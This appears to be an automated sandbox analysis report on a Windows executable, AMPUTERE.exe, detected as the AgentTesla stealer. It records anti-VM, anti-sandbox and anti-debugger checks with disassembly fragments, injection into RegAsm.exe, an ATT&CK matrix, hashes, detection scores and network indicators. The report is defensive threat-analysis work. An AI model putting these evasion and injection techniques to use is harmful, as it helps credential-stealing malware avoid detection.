Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\AMPUTERE.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\AMPUTERE.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005261EC second address: 00000000005261EC instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526246 second address: 0000000000526246 instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526315 second address: 0000000000526315 instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005233AC second address: 00000000005233AC instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99848EE8F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test dh, ch 0x00000020 add edi, edx 0x00000022 test ecx, ebx 0x00000024 dec ecx 0x00000025 jmp 00007F99848EE90Ah 0x00000027 test bl, bl 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F99848EE8A5h 0x0000002e push ecx 0x0000002f jmp 00007F99848EE90Ah 0x00000031 cmp bh, ah 0x00000033 cmp ah, bh 0x00000035 call 00007F99848EE93Fh 0x0000003a call 00007F99848EE908h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005235B0 second address: 00000000005235B0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99845B8528h 0x0000001d popad 0x0000001e jmp 00007F99845B565Ah 0x00000020 test ch, dh 0x00000022 call 00007F99845B568Bh 0x00000027 lfence 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526BD4 second address: 0000000000526BD4 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFB8h 0x0000000d jne 00007F99848EE922h 0x0000000f cmp ecx, 00002000h 0x00000015 jne 00007F99848EE7C6h 0x0000001b inc ecx 0x0000001c inc ebx 0x0000001d test cl, dl 0x0000001f cmp dword ptr [ebx], 9090C350h 0x00000025 jne 00007F99848EE926h 0x00000027 cmp edx, 257E6A7Fh 0x0000002d cmp edx, dword ptr [ebx] 0x0000002f jne 00007F99848EE916h 0x00000031 test dh, ch 0x00000033 cmp byte ptr [ebx], FFFFFFE8h 0x00000036 jne 00007F99848EE95Bh 0x00000038 cmp edi, 1B7EF1A7h 0x0000003e pushad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005209F7 second address: 00000000005209F7 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000011035B0 second address: 00000000011035B0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99848F17D8h 0x0000001d popad 0x0000001e jmp 00007F99848EE90Ah 0x00000020 test ch, dh 0x00000022 call 00007F99848EE93Bh 0x00000027 lfence 0x0000002a rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001101F6C second address: 0000000001101F83 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 call 00007F99845B5BC9h 0x00000008 cmp dword ptr [edi+00000818h], 00000000h 0x0000000f je 00007F99845B5708h 0x00000015 test ah, ah 0x00000017 ret 0x00000018 cmp edx, A37443ABh 0x0000001e test edx, ecx 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 pushad 0x00000027 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001101F83 second address: 0000000001101F83 instructions:

Source: C:\Users\user\Desktop\AMPUTERE.exe

Code function: 0_2_00409418 rdtsc

0_2_00409418

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 772	Thread sleep time: -3210000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 772	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: RegAsm.exe, 00000013.00000002.865466102.00000000203F0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000013.00000002.865466102.00000000203F0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000013.00000002.865466102.00000000203F0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000013.00000002.865466102.00000000203F0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\AMPUTERE.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\AMPUTERE.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\AMPUTERE.exe

Code function: 0_2_00409418 rdtsc

0_2_00409418

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 19_2_01104417 LdrInitializeThunk,

19_2_01104417

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110690F mov eax, dword ptr fs:[00000030h]	19_2_0110690F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01106977 mov eax, dword ptr fs:[00000030h]	19_2_01106977
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011031DF mov eax, dword ptr fs:[00000030h]	19_2_011031DF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01106089 mov eax, dword ptr fs:[00000030h]	19_2_01106089
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01105733 mov eax, dword ptr fs:[00000030h]	19_2_01105733
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01103200 mov eax, dword ptr fs:[00000030h]	19_2_01103200

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\AMPUTERE.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 1100000

Jump to behavior

Source: C:\Users\user\Desktop\AMPUTERE.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\AMPUTERE.exe'

Jump to behavior

Source: RegAsm.exe, 00000013.00000002.860438642.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000013.00000002.860438642.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000013.00000002.860438642.0000000001980000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: RegAsm.exe, 00000013.00000002.860438642.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 19_2_011069B3 cpuid

19_2_011069B3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6044, type: MEMORY

Source: Yara match	File source: 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6044, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6044, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Access Token Manipulation1	Disable or Modify Tools1	Input Capture1	Security Software Discovery731	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Virtualization/Sandbox Evasion341	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Access Token Manipulation1	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	System Information Discovery423	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
AMPUTERE.exe	45%	Virustotal		Browse
AMPUTERE.exe	69%	ReversingLabs	Win32.Trojan.GenericML
AMPUTERE.exe	100%	Avira	HEUR/AGEN.1138570
AMPUTERE.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.AMPUTERE.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138570		Download File
0.0.AMPUTERE.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138570		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://CFlLIU.com	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
googlehosted.l.googleusercontent.com	216.58.215.225	true	false		high
doc-14-a0-docs.googleusercontent.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://CFlLIU.com	RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.215.225	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	379730
Start date:	01.04.2021
Start time:	07:40:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	AMPUTERE.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.9% (good quality ratio 37%) Quality average: 21.8% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 87% Number of executed functions: 155 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 168.61.161.212, 13.107.4.50, 104.43.139.144, 40.88.32.150, 20.82.210.154, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 23.218.208.56, 216.58.215.238 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, b1ns.au-msedge.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, c-0001.c-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:45:34	API Interceptor	158x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	martin.connor SWIFT Copy 2021.htm	Get hash	malicious	Browse	216.58.215.225
	xXeJaeHDWB.exe	Get hash	malicious	Browse	216.58.215.225
	Purchase_Order 3109.xls	Get hash	malicious	Browse	216.58.215.225
	Invoice_150.xlsm	Get hash	malicious	Browse	216.58.215.225
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	216.58.215.225
	#Ufffd.HTML	Get hash	malicious	Browse	216.58.215.225
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	216.58.215.225
	SecuriteInfo.com.Mal.GandCrypt-A.4160.exe	Get hash	malicious	Browse	216.58.215.225
	1Nqs1iTfMz.exe	Get hash	malicious	Browse	216.58.215.225
	yPkfbflyoh.exe	Get hash	malicious	Browse	216.58.215.225
	SOC_0#7198, INV#512 Via GoogleDocs gracechung.html	Get hash	malicious	Browse	216.58.215.225
	lv.exe	Get hash	malicious	Browse	216.58.215.225
	8637.xlsx	Get hash	malicious	Browse	216.58.215.225
	YtR0OI1H6G.exe	Get hash	malicious	Browse	216.58.215.225
	ABS Browser.exe	Get hash	malicious	Browse	216.58.215.225
	reciept-id.htm	Get hash	malicious	Browse	216.58.215.225
	Closure TP-Stamp.htm	Get hash	malicious	Browse	216.58.215.225
	Audio playback (7656) for joew Camrosa.htm	Get hash	malicious	Browse	216.58.215.225
	CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Get hash	malicious	Browse	216.58.215.225
	JYDy1dAHdW.exe	Get hash	malicious	Browse	216.58.215.225

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.402488868367982
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AMPUTERE.exe
File size:	90112
MD5:	f2fa3c87de32858f1244fb352873f399
SHA1:	3d6f6d635639c689a8e4709ccb379500b4e76096
SHA256:	2beda3caff1f808814294dca346cbe62ad229272d54696fe75e99388a73ff3cc
SHA512:	46058516a19a7db0833fd84a17ab9f8a80b992e6ac76727abe879dd1bf2e5a04636b7436746b5a472dd67c1efa42a007a88779a2f1f6ec12d431a6be8a13a605
SSDEEP:	768:xKOhTQs/sICfEBiQPIHYqH3qkfNS1Z5EK8GEHPZNrLzrKBvY:1hkGxCfEBiiIjHBG8tHC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......T................. ...0...............0....@................

File Icon


Icon Hash:	f1f8f6f0f0e4f831

Static PE Info

General
Entrypoint:	0x4016fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x540DA20E [Mon Sep 8 12:33:18 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c78f78af0a4b82efe93f926bf0040578

Entrypoint Preview

Instruction
push 0040CE4Ch
call 00007F9984FBFCD5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dl, al
push eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11ec4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1412	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x114d8	0x12000	False	0.434828016493	data	5.9787925967	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x13000	0xa64	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1412	0x2000	False	0.291259765625	data	3.29525991326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x14d4a	0x6c8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x143c2	0x988	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x143a0	0x22	data
RT_VERSION	0x14120	0x280	data	Guarani	Paraguay

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaDateVar, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0474 0x04b0
InternalName	AMPUTERE
FileVersion	3.03
CompanyName	Panasonic
Comments	Panasonic
ProductName	Panasonic
ProductVersion	3.03
FileDescription	Panasonic
OriginalFilename	AMPUTERE.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Guarani	Paraguay

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/01/21-07:41:42.432040	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:42.464302	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/01/21-07:41:42.470500	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:42.502832	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/01/21-07:41:42.506701	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:42.540227	ICMP	449	ICMP Time-To-Live Exceeded in Transit	91.206.52.152	192.168.2.6
04/01/21-07:41:42.540792	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:46.555734	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:50.533063	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:54.533682	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:41:58.533986	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:03.273472	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
